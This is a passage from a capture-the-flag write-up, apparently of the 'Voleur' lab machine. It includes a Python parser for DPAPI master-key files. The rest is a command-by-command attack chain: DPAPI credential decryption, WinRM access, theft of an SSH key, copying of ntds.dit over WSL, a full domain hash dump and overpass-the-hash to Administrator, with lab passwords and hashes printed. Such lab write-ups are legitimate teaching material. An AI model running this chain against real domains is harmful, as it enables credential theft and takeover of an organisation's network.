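Before handing masterkey.bin to impacket, it helps to see what the file actually contains. The following Python is an added example, not part of the original write-up: a standard-library parser for the DPAPI master-key file layout (the same fields impacket's dpapi masterkey prints below), run on the base64 blob dumped above. The structure is the one impacket's dpapi.py and mimikatz's kuhl_m_dpapi document; the embedded blob is the page's own data, and the function names are this example's own.

```python
"""Parse a DPAPI master-key file (the UUID-named file under
AppData\\Roaming\\Microsoft\\Protect\\<SID>\\) with the standard library only.

Added example, not from the original write-up. Layout as in impacket's
dpapi.py / mimikatz kuhl_m_dpapi: a 128-byte header followed by the
MasterKey, BackupKey, CredHist and DomainKey sections in that order.
"""
import base64
import struct
import uuid

# todd.wolfe's master-key file as dumped with [Convert]::ToBase64String on this page.
MASTERKEY_B64 = "AgAAAAAAAAAAAAAAMAA4ADkANAA5ADMAOAAyAC0AMQAzADQAZgAtADQAYwA2ADMALQBiADkAMwBjAC0AYwBlADUAMgBlAGYAYwAwAGEAYQA4ADgAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAASAWcret5vHz2ZFDJGrnZI1BGAAAJgAAAA2YAAANcj1B/jylUhNcSe+UibSS+B7/bdiHKg/fYSD6cibplaMd3Y4zsjKqsVTKcNtLlcdFUHq1DuFNs3RIWP+bmweMuDU8cufImoeLTlQpIYdMh+W9gPmEl8K4uE7aQE3Yw5XcATlxytrmIAgAAAB7vnBVPlWNLbxgEAtZNEf5QRgAACYAAAANmAABK1OOpu3KshUr3dLNdcY8yUp0/QCvW9RyADda8JEaf/e2Qbn8XnQuQPb/7LENveEXSO4R2DsxXLXCs4ban1JazinCCqkvrWW0CAAAAAAEAAFgAAACEizqYyco/TqsQ3rgf7i9DSOaEVnONX4KQQG5p9lFlW0/lt1Tnj0do7kUF1rtUFAHLJCLhNsUpKRlyquQSSM0FnaIPoACBXWAUQ8P1KLfVosXGHH5zx9BwP8S+SjguDL3ipMNTWgTbAxzMB6wei02C/GjW4TTqZz6d/ENfJi79Quwp48np4xmtDOMKfNBKdPGdHIBSeJBJ90SpBN/sFHoveguRpfGmcJVpE4P/2yZWHcHSlTXxx1bF2GR/N32eLVzlDW8U0jiqZXz+GAxZPJcXVZzcwJCnQ86b5WV9YBrXq3d5gyGPGWgx3cryZPMR+03CQtT41lxN4CfgfD59crbmN5sMZCp6KG5RyRs3J1k0BXwLy8Ri33WwYhOUCCi9pSj1y3vvwqmAV4v1UydH0PXPlH+39e2oB2487UTGGdlyaQgs0YW7H5gWzc92ZrcTK1TXBO6ln7meBvmkT1RuqEZHHTpfWoKJFHs="
MASTERKEY_BYTES = base64.b64decode(MASTERKEY_B64)

# version(4) reserved(8) guid as UTF-16LE text(72) unknown(4) unknown(4) flags/policy(4)
# followed by four little-endian 64-bit section lengths: 128 bytes in total.
_HEADER = struct.Struct("<L8s72s3L4Q")

# wincrypt CALG_* identifiers that show up in these files.
CALG_NAMES = {0x8009: "CALG_HMAC", 0x6603: "CALG_3DES",
              0x800E: "CALG_SHA_512", 0x6610: "CALG_AES_256"}


def parse_key_section(blob: bytes) -> dict:
    """MasterKey / BackupKey section: a PBKDF2-protected ciphertext."""
    version, salt, rounds, hash_alg, crypt_alg = struct.unpack_from("<L16s3L", blob, 0)
    return {
        "version": version,
        "salt": salt,
        "rounds": rounds,          # PBKDF2 iteration count
        "hash_alg": hash_alg,      # PRF used by PBKDF2 and the integrity HMAC
        "crypt_alg": crypt_alg,    # cipher protecting the key material
        "ciphertext": blob[32:],   # encrypted key + HMAC
    }


def parse_domain_key(blob: bytes) -> dict:
    """DomainKey section: the master key wrapped with the domain's DPAPI backup public key."""
    version, secret_len, check_len = struct.unpack_from("<3L", blob, 0)
    guid = uuid.UUID(bytes_le=blob[12:28])
    secret = blob[28:28 + secret_len]
    access_check = blob[28 + secret_len:28 + secret_len + check_len]
    return {"version": version, "backup_key_guid": str(guid),
            "secret": secret, "access_check": access_check}


def parse_masterkey_file(data: bytes) -> dict:
    """Decode the header and every section; 'complete' is False if the file is truncated."""
    (version, _reserved, guid_utf16, _unk1, _unk2, flags,
     mk_len, bk_len, ch_len, dk_len) = _HEADER.unpack_from(data, 0)
    if version != 2:
        raise ValueError(f"unsupported master-key file version {version}")
    lengths = {"masterkey": mk_len, "backupkey": bk_len, "credhist": ch_len, "domainkey": dk_len}
    expected = _HEADER.size + sum(lengths.values())
    sections, offset = {}, _HEADER.size
    for name, length in lengths.items():
        sections[name] = data[offset:offset + length]
        offset += length
    return {
        "guid": guid_utf16.decode("utf-16-le").rstrip("\x00"),
        "flags": flags,
        "lengths": lengths,
        "expected_size": expected,
        "complete": len(data) == expected,
        "masterkey": parse_key_section(sections["masterkey"]) if mk_len else None,
        "backupkey": parse_key_section(sections["backupkey"]) if bk_len else None,
        "domainkey": parse_domain_key(sections["domainkey"]) if dk_len else None,
    }


def describe(info: dict) -> str:
    """Human-readable summary, in the spirit of impacket's dpapi masterkey output."""
    mk = info["masterkey"]
    lines = [f"guid      : {info['guid']}",
             f"sections  : {info['lengths']} (complete={info['complete']})",
             f"masterkey : v{mk['version']} salt={mk['salt'].hex()} rounds={mk['rounds']} "
             f"{CALG_NAMES.get(mk['hash_alg'], hex(mk['hash_alg']))}/"
             f"{CALG_NAMES.get(mk['crypt_alg'], hex(mk['crypt_alg']))}"]
    if info["domainkey"]:
        dk = info["domainkey"]
        lines.append(f"domainkey : backup-key guid {dk['backup_key_guid']}, "
                     f"{len(dk['secret'])}-byte secret wrapped with the domain backup key")
    return "\n".join(lines)


if __name__ == "__main__":
    print(describe(parse_masterkey_file(MASTERKEY_BYTES)))
```

The MasterKey section is the part impacket decrypts with the password: PBKDF2 over a key derived from the user's credential and SID, with the salt and round count read from this header, then 3DES-CBC and an HMAC check. The DomainKey section is the practitioner's caveat: a domain user's master key is also wrapped with the domain's DPAPI backup public key, so whoever holds the backup private key (a domain admin, via the DC) can recover every user's master key without any password at all.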
```
└─$ impacket-dpapi masterkey -file masterkey.bin -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
└─$ impacket-dpapi credential -file cred.bin -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
```
That yields jeremy.combs:qT3V9pLXyN7W4m. "MD4 protected" in the first output means the master key was unlocked with a key derived from the NT hash of the password, which is how domain users' master keys are protected; the target name Jezzas_Account is only the label the credential was saved under, and the Username field is the account that matters.

```
└─$ impacket-getTGT voleur.htb/jeremy.combs:'qT3V9pLXyN7W4m' -dc-ip 10.129.232.130
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in jeremy.combs.ccache
└─$ export KRB5CCNAME=jeremy.combs.ccache
└─$ evil-winrm -i DC.voleur.htb -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jeremy.combs\Documents> whoami
voleur\jeremy.combs
```
Privilege Escalation
As seen earlier, jeremy.combs is a member of the Third-Line Support group, whose directory on the IT share is the next stop.
```
*Evil-WinRM* PS C:\IT\Third-Line Support> dir
Directory: C:\IT\Third-Line Support
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2025 8:11 AM Backups
-a---- 1/30/2025 8:10 AM 2602 id_rsa
-a---- 1/30/2025 8:07 AM 186 Note.txt.txt
*Evil-WinRM* PS C:\IT\Third-Line Support> cat Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
*Evil-WinRM* PS C:\IT\Third-Line Support> download id_rsa
Info: Downloading C:\IT\Third-Line Support\id_rsa to id_rsa
Info: Download successful!
```
After restricting the key's permissions (chmod 600 id_rsa; ssh ignores a world-readable private key), we connect to the port 2222 seen in the scan. The note points at WSL and backup tooling, and the key turns out to belong to the svc_backup account:
```
└─$ ssh -i id_rsa svc_backup@voleur.htb -p 2222
The authenticity of host '[voleur.htb]:2222 ([10.129.232.130]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:mKWAEwLTnEN2bJNi7fkc+BZodiXCIiP3ywSLJiZL0ss
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[voleur.htb]:2222' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 2 16:24:31 PST 2026
System load: 0.52 Processes: 9
Usage of /home: unknown Users logged in: 0
Memory usage: 33% IPv4 address for eth0: 10.129.232.130
Swap usage: 0%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Jan 30 04:26:24 2025 from 127.0.0.1
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$ whoami
svc_backup
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ ls -al
total 24592
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 2025 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup 16384 Jan 30 2025 ntds.jfm
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ cd ..
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ cd registry/
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$ ls -al
total 17952
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 32768 Jan 30 2025 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 2025 SYSTEM
```
The 4.4.0-20348-Microsoft kernel string and the hostname DC show this is WSL running on the domain controller itself, with the Windows drive mounted at /mnt/c. The Backups directory holds ntds.dit (with its ntds.jfm) plus the SYSTEM and SECURITY hives, so we copy everything to the attacking machine with scp. ntds.dit together with the SYSTEM hive (which carries the boot key that unlocks the PEK) is enough to dump every domain hash offline:
```
└─$ scp -P 2222 -i id_rsa -r svc_backup@voleur.htb:"/mnt/c/IT/Third-Line Support/Backups" .
ntds.dit 100% 24MB 1.2MB/s 00:19
ntds.jfm 100% 16KB 25.5KB/s 00:00
SECURITY 100% 32KB 51.0KB/s 00:00
SYSTEM 100% 18MB 586.0KB/s 00:30
```
```
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
...
[*] Cleaning up...
```
Shell
NTLM is disabled on the DC, so the Administrator NT hash cannot be used for pass-the-hash over SMB or WinRM directly; instead it is used as the Kerberos RC4 key to request a TGT (overpass-the-hash), and that ticket gets us in:
```
└─$ impacket-getTGT voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
└─$ export KRB5CCNAME=administrator.ccache
└─$ evil-winrm -i DC.voleur.htb -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
voleur\administrator
```